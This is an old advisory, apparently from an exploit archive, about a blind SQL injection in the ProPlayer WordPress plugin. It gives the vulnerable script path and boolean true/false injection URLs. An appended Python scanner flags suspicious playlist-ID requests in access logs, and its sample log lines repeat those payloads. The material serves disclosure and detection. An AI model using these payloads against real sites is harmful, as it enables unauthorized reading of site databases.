WP-ProPlayer Plugin Blind SQL Injection

22/06/2011 15:39

 <-------


   WP-ProPlayer Blind SQL Injection

   Found by: Ca0s

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL: 
      http://wordpress.org/extend/plugins/proplayer/
      http://isagoksu.com/proplayer-wordpress-plugin/
   Vuln: Blind SQL Injection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27, so it won't work this way.

------->
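
Added example (not part of the original advisory): a log check that flags requests to the script and parameter named above whose pp_playlist_id is not a plain integer, treating a raw ' and its %27 form the same. It assumes legitimate playlist IDs are numeric and that the server writes common/combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path and parameter name as given in the advisory.
VULN_PATH = "/wp-content/plugins/proplayer/playlist-controller.php"
PARAM = "pp_playlist_id"

# Request field of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_playlist_id(log_line):
    """Return the decoded pp_playlist_id if it is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith(VULN_PATH):
        return None
    # parse_qs percent-decodes values and maps '+' to a space, so a raw
    # quote and a %27-encoded quote end up as the same character.
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        # Assumption: a legitimate ID consists of ASCII digits only.
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_playlist_id(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log (documentation IP addresses, invented sizes).
SAMPLE_LOG = """
203.0.113.5 - - [22/Jun/2011:15:40:01 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=12 HTTP/1.1" 200 512
203.0.113.9 - - [22/Jun/2011:15:41:10 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=12')+and+('a'='a HTTP/1.1" 200 512
203.0.113.9 - - [22/Jun/2011:15:41:11 +0000] "GET /blog/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=12%27)+and+(%27a%27=%27b HTTP/1.1" 200 0
203.0.113.7 - - [22/Jun/2011:15:42:00 +0000] "GET /index.php?pp_playlist_id=abc HTTP/1.1" 200 900
""".strip().splitlines()

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric {PARAM} = {value!r}")
```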